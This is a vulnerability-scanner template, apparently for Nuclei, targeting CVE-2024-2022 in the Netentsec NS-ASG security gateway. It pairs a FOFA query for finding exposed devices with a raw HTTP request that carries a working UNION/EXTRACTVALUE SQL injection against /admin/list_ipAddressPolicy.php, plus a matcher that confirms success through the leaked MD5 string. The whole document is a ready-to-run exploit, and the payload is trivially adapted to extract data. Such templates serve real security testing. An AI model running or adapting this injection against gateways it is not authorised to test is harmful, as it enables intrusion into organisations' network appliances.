id: NS-ASG-list_ipAddressPolicy-sqli

info:
  name: 网康应用安全网关(NS-ASG)-SQL注入-list_ipAddressPolicy(CVE-2024-2022)
  author: rain
  severity: critical
  metadata: 
    fofa-query: app="网康科技-NS-ASG安全网关"
requests:
  - raw:
      - |
        GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(123456)),0x7e)) HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close



    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200 && contains(body, "adc3949ba59abbe56e057")'